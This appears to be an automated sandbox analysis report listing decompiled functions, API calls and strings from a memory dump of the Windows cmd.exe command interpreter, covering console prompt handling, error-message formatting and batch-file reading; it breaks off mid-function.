0x00d8f7a1
0x00d8f7a3
0x00d8f580
0x00d8f580
0x00d8f583
0x00d8f586
0x00d8f588
0x00000000
0x00d8f58a
0x00000000
0x00d8f7a9
0x00d8f7ad
0x00000000
0x00d8f7b3
0x00000000
0x00d8f7b3
0x00d8f7ad
0x00d8f7a3
0x00000000
0x00000000
0x00d8f758
0x00d8f75d
0x00000000
0x00d8f763
0x00d9c552
0x00000000
0x00d9c558
0x00d8f82f
0x00d8f82f
0x00d8f833
0x00000000
0x00d8f839
0x00000000
0x00d8f839
0x00d8f833
0x00d9c552
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f576
0x00d8f52c
0x00d8f52c
0x00d8f52c
0x00d8f533
0x00d8f840
0x00000000
0x00d8f846
0x00d8f84b
0x00d8f851
0x00000000
0x00d8f857
0x00d8f85a
0x00000000
0x00d8f860
0x00d9c562
0x00d9c568
0x00000000
0x00d9c56e
0x00000000
0x00d9c56e
0x00d9c568
0x00d8f85a
0x00d8f851
0x00000000
0x00d8f539
0x00d8f539
0x00d8f53d
0x00d8f671
0x00d8f674
0x00d8f674
0x00d8f545
0x00d8f58d
0x00d8f593
0x00d8f598
0x00000000
0x00d8f59a
0x00d8f59e
0x00d8f667
0x00d8f5a4
0x00d8f5a4
0x00d8f5a4
0x00d8f5ab
0x00d8f5b1
0x00d8f5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f5b6
0x00d8f547
0x00d8f547
0x00d8f548
0x00d8f54e
0x00d8f553
0x00d8f5fb
0x00d8f611
0x00d8f641
0x00d8f646
0x00d8f64c
0x00d8f657
0x00d8f65c
0x00000000
0x00d8f662
0x00000000
0x00d8f662
0x00000000
0x00000000
0x00000000
0x00d8f613
0x00d8f613
0x00d8f618
0x00d8f61b
0x00d8f621
0x00d8f626
0x00000000
0x00d8f628
0x00d8f630
0x00d8f636
0x00d8f63b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f63b
0x00d8f626
0x00000000
0x00d8f559
0x00d8f559
0x00d8f55f
0x00d8f5b8
0x00d8f5b8
0x00d8f561
0x00d8f561
0x00d8f564
0x00d8f567
0x00000000
0x00d8f567
0x00d8f55f
0x00d8f553
0x00d8f545
0x00d8f533
0x00d8f5bb
0x00d8f5be
0x00d8f5c3
0x00d8f5c6
0x00d8f5c9
0x00d8f5ce
0x00d8f5d0
0x00d8f5dc
0x00d8f5de
0x00d8f5de
0x00d8f5dc
0x00d8f5e7
0x00d9c57b
0x00d9c58b
0x00000000
0x00d9c590
0x00d9c57b
0x00d8f5f8
0x00000000
0x00d9c52a
0x00d9c52e
0x00d9c538
0x00000000
0x00d9c53e
0x00d9c543
0x00000000
0x00d9c543
0x00000000
0x00d9c538
0x00d8f507
0x00000000

APIs

_setjmp3.MSVCRT ref: 00D8F318
iswspace.MSVCRT ref: 00D8F35B
wcschr.MSVCRT ref: 00D8F37D
iswdigit.MSVCRT ref: 00D8F3DE
iswspace.MSVCRT ref: 00D8F4A6
wcschr.MSVCRT ref: 00D8F4C7
iswdigit.MSVCRT ref: 00D8F4D9
iswdigit.MSVCRT ref: 00D8F548
iswspace.MSVCRT ref: 00D8F58D
wcschr.MSVCRT ref: 00D8F5AB
iswspace.MSVCRT ref: 00D8F61B
wcschr.MSVCRT ref: 00D8F630
iswspace.MSVCRT ref: 00D8F709

Strings

=,;, xrefs: 00D8F376, 00D8F37C, 00D8F4C0, 00D8F4C6, 00D8F5A4, 00D8F5AA, 00D8F7F9
()|&=,;", xrefs: 00D8F62B, 00D8F890
Ungetting: '%s', xrefs: 00D9C4E2

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: iswspace$wcschr$iswdigit$_setjmp3
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1805751789-2755026540
Opcode ID: cd37dfa20eace6de788757522a83e93beb21a1025388720db9611e7cade3e3f4
Instruction ID: 232bd8ac072629dd905c50a47e942f4d31efa84eafe563ee1ae8b4b570d9932a
Opcode Fuzzy Hash: cd37dfa20eace6de788757522a83e93beb21a1025388720db9611e7cade3e3f4
Instruction Fuzzy Hash: B3E1BAB1A00302DADF20BF69D8497BA77A4EF15364F2C0277E885D62A1E334CD409776

Uniqueness

Uniqueness Score: -1.00%

Function 00DA9583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00DA9583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E00D8B3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0xdb3888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0xdc94b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E00D8C108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E00D8C108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E00D90178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E00DA3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E00D90178(_t82) == 0 || ( *0xdc3aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E00D925D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E00D925D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0xdb3888;
									if(_t127 != 0) {
										 *0xdc94b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E00D96FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E00D91040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E00D85DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E00D90178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E00D8DB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}

0x00da9583
0x00da958b
0x00da9592
0x00da9596
0x00da959c
0x00da959e
0x00da95a1
0x00da95a4
0x00da95a7
0x00da95ab
0x00da95b6
0x00da95e9
0x00da95e9
0x00da95ef
0x00da95f1
0x00da95f6
0x00da9634
0x00da9634
0x00da963e
0x00da9643
0x00da9645
0x00da9645
0x00da964d
0x00000000
0x00000000
0x00da964f
0x00da9656
0x00000000
0x00000000
0x00da9658
0x00da965b
0x00da965e
0x00da9661
0x00000000
0x00000000
0x00da9669
0x00da9669
0x00da966c
0x00da966e
0x00da9670
0x00da9673
0x00da9673
0x00da9676
0x00da9679
0x00da9679
0x00da967c
0x00da967f
0x00da9686
0x00da968c
0x00da968f
0x00da969d
0x00da96a4
0x00da96af
0x00da96b4
0x00da96b7
0x00da96bd
0x00da96bd
0x00da96cb
0x00da96d2
0x00da96dd
0x00da96e4
0x00da96e9
0x00da96ef
0x00da96f7
0x00da96fe
0x00da9700
0x00da9706
0x00da9706
0x00da9708
0x00da9708
0x00da970f
0x00da9717
0x00da9719
0x00da971b
0x00da971f
0x00da9724
0x00da9734
0x00da9736
0x00da9737
0x00da973c
0x00da9726
0x00da972a
0x00da972f
0x00da972f
0x00da973f
0x00da9748
0x00da9753
0x00da9753
0x00da975e
0x00000000
0x00000000
0x00000000
0x00000000
0x00da9764
0x00da9764
0x00da976c
0x00da9772
0x00da9775
0x00da977e
0x00000000
0x00000000
0x00da9788
0x00da9793
0x00da9796
0x00da9799
0x00da9799
0x00da979c
0x00da979e
0x00da97a7
0x00da97b6
0x00da97bc
0x00da97c1
0x00da97c1
0x00da97c9
0x00000000
0x00da97cb
0x00000000
0x00da97cb
0x00da97c9
0x00da97cd
0x00da97d6
0x00da97d9
0x00da97de
0x00da97e1
0x00da97ec
0x00da97ee
0x00da97f3
0x00da9714
0x00da9714
0x00000000
0x00da9714
0x00da97fe
0x00da9803
0x00000000
0x00000000
0x00da980d
0x00da9810
0x00da9818
0x00da9818
0x00da9820
0x00da9826
0x00da982c
0x00da9834
0x00da983d
0x00da9843
0x00da9843
0x00da9834
0x00da9845
0x00da9847
0x00da9857
0x00da9857
0x00da9717
0x00da9667
0x00000000
0x00000000
0x00000000
0x00da9667
0x00da95f8
0x00da95fa
0x00da95fa
0x00da9603
0x00da9603
0x00da9606
0x00da9609
0x00da9615
0x00000000
0x00000000
0x00da9620
0x00da9629
0x00da962f
0x00000000
0x00da962f
0x00da95b8
0x00da95bb
0x00da95c2
0x00da95c7
0x00000000
0x00000000
0x00da95cb
0x00da95d0
0x00da95d2
0x00da95d4
0x00da95db
0x00da95e7
0x00000000
0x00da95e7
0x00da95dd
0x00000000

APIs

_wcsupr.MSVCRT ref: 00DA9629
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00DA968F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00DA9697
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA96A7
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA96BD
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00DA96C5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA96D5
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00DA96E9
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00DA974C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00DA9753
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00DA976C
towupper.MSVCRT ref: 00DA978D
wcschr.MSVCRT ref: 00DA97E6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00DA9818
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00DA9826

Part of subcall function 00D90178: _get_osfhandle.MSVCRT ref: 00D90183
Part of subcall function 00D90178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D

Part of subcall function 00D8DB92: _close.MSVCRT ref: 00D8DBC1

Strings

CMD.EXE, xrefs: 00DA9836
<noalias>, xrefs: 00DA96F9

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 2015057810-1690691951
Opcode ID: 4b2fa7591232bcbfaf63879dd6dfce1e1fe63315ef91e5672b3a178dd08508cc
Instruction ID: 2d8ddc5f4dbc0a6295243d1ba1d39650940631511c2e1667274c61e8e561499c
Opcode Fuzzy Hash: 4b2fa7591232bcbfaf63879dd6dfce1e1fe63315ef91e5672b3a178dd08508cc
Instruction Fuzzy Hash: 9681CF76E002159BCF14AFA4DC69AEEFBB9AF46710F1C0119E802E7290EB749D45D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00DA1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E00D96FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0xdc807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0xdc8081 == 0) {
						L5:
						_v524 = 0xd830d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E00DA24CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E00DA24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E00DA24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E00DA24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E00DA24CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E00DA24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E00DA24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E00DA24CB();
								} else {
									E00DA24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E00DA24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0xdc94b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}

0x00da1c79
0x00da1c84
0x00da1c8b
0x00da1c91
0x00da1c93
0x00da1c9a
0x00da1c9f
0x00da1e72
0x00da1e83
0x00da1cad
0x00da1cad
0x00da1cae
0x00da1cb6
0x00da1cbb
0x00da1cde
0x00da1ce2
0x00da1cec
0x00da1cee
0x00da1d23
0x00da1cf0
0x00da1cf0
0x00da1cf3
0x00da1d17
0x00da1cf5
0x00da1cf5
0x00da1cf8
0x00da1d0b
0x00da1cfa
0x00da1cfd
0x00da1cff
0x00da1cff
0x00da1cfd
0x00da1cf8
0x00da1cf3
0x00da1d35
0x00da1d51
0x00da1d61
0x00da1d64
0x00da1d67
0x00da1d6a
0x00da1d83
0x00da1d88
0x00da1d89
0x00da1d8a
0x00da1d8f
0x00da1d6c
0x00da1d6c
0x00da1d79
0x00da1d7e
0x00da1d7e
0x00da1d96
0x00da1d98
0x00da1da4
0x00da1da9
0x00da1dac
0x00da1dac
0x00da1db4
0x00da1db5
0x00da1dbe
0x00da1dbf
0x00da1dcf
0x00da1dd6
0x00da1ddc
0x00da1dec
0x00da1df1
0x00da1df2
0x00da1df3
0x00da1df8
0x00da1dff
0x00da1e0b
0x00da1e10
0x00da1e10
0x00da1e17
0x00da1e23
0x00da1e28
0x00da1e28
0x00da1e2f
0x00da1e4c
0x00da1e62
0x00da1e67
0x00da1e68
0x00da1e69
0x00da1e4e
0x00da1e58
0x00da1e5d
0x00da1e31
0x00da1e31
0x00da1e3e
0x00da1e43
0x00da1e2f
0x00000000
0x00da1cc5
0x00da1cca
0x00da1cd0
0x00da1cd8
0x00da1e71
0x00da1e71
0x00000000
0x00da1e71
0x00000000
0x00da1cd8
0x00da1cbb

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 00DA1D51
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DA1DB8

Strings

Exception, xrefs: 00DA1D23
, xrefs: 00DA1DEC
%hs(%d)\%hs!%p: , xrefs: 00DA1D72
%hs!%p: , xrefs: 00DA1D83
ReturnHr, xrefs: 00DA1D17
CallContext:[%hs] , xrefs: 00DA1E1C
[%hs], xrefs: 00DA1E51
(caller: %p) , xrefs: 00DA1D9D
Msg:[%ws] , xrefs: 00DA1E04
%hs(%d) tid(%x) %08X %ws, xrefs: 00DA1DC8
[%hs(%hs)], xrefs: 00DA1E37
FailFast, xrefs: 00DA1CFF
LogHr, xrefs: 00DA1D0B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-2849347638
Opcode ID: bc7a25a9d899696342ab5cbe6ea5edc8f14b123b1c43253ff41c17cc4533314a
Instruction ID: a3d1a110798d31f01e04e2deac63fb8efb34a0702cccafab416cbaabb27e42ae
Opcode Fuzzy Hash: bc7a25a9d899696342ab5cbe6ea5edc8f14b123b1c43253ff41c17cc4533314a
Instruction Fuzzy Hash: E45145B5900300ABDF30AF6ACC09E77B7B9EF5AB00F08065DF55A92262D671DA44CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D8E560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00D8E560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0xdc3cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0xdad544 != 0) {
							E00DA921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0xdad590 = 0;
						if( *0xdc3cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E00D90662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E00D8EEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0xdbf980 == 0x234a) {
									E00DA82EB(_t118);
									__eflags =  *0xdad0c8 - 1;
									if( *0xdad0c8 == 1) {
										__eflags =  *0xdc8530;
										if( *0xdc8530 == 0) {
											E00DA6FF0(_t118);
											E00D8C108(_t118, 0x2371, 1, 0xdb3892);
											_t152 = _t152 + 0xc;
										}
									}
									E00DA9287(_t118);
									__imp__longjmp(0xdbb8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E00D900B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E00D96FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E00D8DF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E00D8DF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0xdad0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0xdc8530;
											_t74 = _t124;
											if( *0xdc8530 == 0) {
												E00DA6FF0(_t124);
												_t136 = 0;
												E00DA2ED0(_t147, 0);
												E00D925D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E00D90C70(_t152 + 0x24, _t77) < 0) {
									E00D90DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E00D8DFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E00D90E00(2, _t147);
										E00D906C0(2);
										_t82 = GetConsoleOutputCP();
										 *0xdb3854 = _t82;
										GetCPInfo(_t82, 0xdb3840);
										_t149 =  *0xdad5f8; // 0x0
										if(_t149 == 0) {
